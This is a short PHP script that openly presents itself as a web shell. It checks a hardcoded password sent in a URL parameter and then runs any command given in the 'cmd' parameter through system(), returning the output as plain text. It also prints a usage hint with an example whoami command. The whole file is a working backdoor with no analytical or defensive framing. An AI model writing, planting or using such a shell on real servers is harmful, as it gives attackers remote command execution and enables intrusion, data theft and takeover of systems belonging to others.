<?php
$password = "mengge";
if (!isset($_GET["pass"]) || $_GET["pass"] !== $password) {
    http_response_code(403);
    exit("Forbidden");
}
if (isset($_GET["cmd"])) {
    header("Content-Type: text/plain");
    system($_GET["cmd"]);
} else {
    echo "WebShell Ready. Use ?pass=mengge&cmd=whoami";
}
?>